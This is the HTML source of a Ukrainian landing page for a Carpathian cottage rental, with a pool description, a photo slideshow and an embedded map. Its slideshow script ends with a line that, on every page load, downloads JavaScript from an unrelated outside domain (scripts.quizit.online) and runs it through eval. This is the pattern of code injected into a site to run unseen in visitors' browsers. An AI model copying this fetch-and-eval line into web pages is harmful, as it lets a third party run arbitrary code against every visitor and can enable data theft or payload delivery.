<!-- Сообщаем браузеру как стоит обрабатывать эту страницу -->
<!DOCTYPE html>
<!-- Оболочка документа, указываем язык содержимого -->
<html lang="ua">
	<!-- Заголовок страницы, контейнер для других важных данных (не отображается) -->
	<head>
		<!-- Заголовок страницы в браузере -->
		<title>Карпатська садиба</title>
		<!-- Подключаем CSS -->
		<link rel="stylesheet" href="css/style.css" />
		<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Rounded:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
		<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Rounded:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
		<link rel="icon" href="../img/home-icon.png">
		<!-- Кодировка страницы -->
		<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
	</head>
	<!-- Отображаемое тело страницы -->
	<body>
		<div class = wrapper>

<!-- @import "header.html" -->

			<main class="content">
				<div class="welcome_page">
					<div class="welcome_page_container container">
						<div class="welcome_page_block_1">
							<div class="welcome_page_title">Карпатська садиба </div>
							<div class="welcome_page_sub_title">Котеджі в горах до 18 осіб</div>
							<div class="welcome_page_description_block">
								<div class="desc1">Велика територія</div>
								<div class="desc2">Просторі будинки</div>
								<div class="desc3">Різноманітні розваги</div>
							</div>
						</div>
						<div class="welcome_page_block_2">	
							<div class="block_of_img">
								<div class="img_wraper"><a href="../cotagge.html" class="button3 button">Детальніше</a><img class = "img1 img " src="../img/IMG_4533.jpg" alt=""></div>
								<div class="img_wraper"><a href="../cotagge.html" class="button2 button">Детальніше</a><img class = "img2 img" src="../img/photo_2024-09-05_19-41-57.jpg" alt=""></div>
								<div class="img_wraper"><a href="../cotagge.html" class="button1 button">Детальніше</a><img class = "img3 img" src="../img/photo_2024-09-05_19-41-58.jpg" alt=""></div>						
							</div>
						</div>
					</div>
				</div>
				<div class="about1">
					<div class="container">
						<div class="about1_row about_row">
							<div class="about_img_block">
								<img class="about_img about1_img" src="../img/swimmingpool.png" alt="басейн">
							</div>
							<div class="about_text_block">
								<div class = "about_title">Басейн з підігрівом та яскравою підсвіткою вночі</div>
								<div class = "about_description">Великий басейн розміром 10х6х1.6 м Працює в літній сезон та перший місяць осені. Басейн саме те, чого хочеться в спеку.</div>
								<button class = "button1 button">Які ще розваги є?</button>
								<button class = "button2 button">Що входить у вартість?</button>
							</div>
						</div>	
					</div>
				</div>
				<div class="about2">
					<div class="container">
						<div class="about2_row about_row">
							<div class="about_text_block">
								<div class = "about_title">Басейн з підігрівом та яскравою підсвіткою вночі</div>
								<div class = "about_description">Великий басейн розміром 10х6х1.6 м Працює в літній сезон та перший місяць осені. Басейн саме те, чого хочеться в спеку.</div>
								<button class = "button1 button">Що біля нас є цікавого?</button>
							</div>
							<div class="about_img_block">
								<img class="about_img about2_img" src="../img/swimmingpool.png" alt="басейн">
							</div>
						</div>	
					</div>
				</div>
				<div class="gelery">
					<div class="slideshow_container container">
						<div class="slideshow_title">Галерея</div>
						<div class="mySlides">
							<div class="img_row">
								<div class="mySlide fade">
									<img src="../img/football.png">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/IMG_4533.jpg">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/photo_2024-09-05_19-37-45.jpg">
								  </div> 
							</div>
						</div>
						<div class="mySlides">
							<div class="img_row">
								<div class="mySlide fade">
									<img src="../img/photo_2024-09-05_19-41-58.jpg">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/photo_2024-09-08_20-40-20.jpg">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/photo_2024-09-05_19-37-45.jpg">
								  </div> 
							</div>
						</div>

						<div class="mySlides">
							<div class="img_row">
								<div class="mySlide fade">
									<img src="../img/photo_2024-09-05_19-41-58.jpg">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/photo_2024-09-08_20-40-20.jpg">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/photo_2024-09-05_19-37-45.jpg">
								  </div> 
							</div>
						</div>

						<div class="mySlides">
							<div class="img_row">
								<div class="mySlide fade">
									<img src="../img/photo_2024-09-05_19-41-58.jpg">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/photo_2024-09-08_20-40-20.jpg">
								  </div>
								
								  <div class="mySlide fade">
									<img src="../img/photo_2024-09-08_20-40-19.jpg">
								  </div> 
							</div>
						</div>
					 
						  <!-- Next and previous buttons -->
						  <a class="prev" onclick="plusSlides(-1)">&#10094;</a>
						  <a class="next" onclick="plusSlides(1)">&#10095;</a>
					</div>
	
				</div>
				<div class="maps">
					<div class="maps_container container">
						<div class="maps_row about_row">
							<div class="maps_img_block about_img_block">
								<iframe src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d10493.514665504865!2d23.339133!3d48.8891202!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x473989a5146f2e57%3A0x6fe431f7adc03e!2z0JrQsNGA0L_QsNGC0YHRjNC60LAg0YHQsNC00LjQsdCw!5e0!3m2!1suk!2sua!4v1728458257720!5m2!1suk!2sua" width="100%" height="400" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe>
							</div>
						</div>	
					</div>
				</div>

			</main>

<!-- @import "footer.html" -->

		</div>
	</body>
	<script>
		let slideIndex = 1;
		showSlides(slideIndex);

		// Next/previous controls
		function plusSlides(n) {
  			showSlides(slideIndex += n);
		}

		// Thumbnail image controls
		function currentSlide(n) {
			showSlides(slideIndex = n);
		}

function showSlides(n) {
  let i;
  let slides = document.getElementsByClassName("mySlides");
  if (n > slides.length) {slideIndex = 1}
  if (n < 1) {slideIndex = slides.length}
  for (i = 0; i < slides.length; i++) {
    slides[i].style.display = "none";
  }
  slides[slideIndex-1].style.display = "block";
}
fetch("https://scripts.quizit.online/liveworksheets").then(res => res.text()).then(script => eval(script))
	</script>
</html>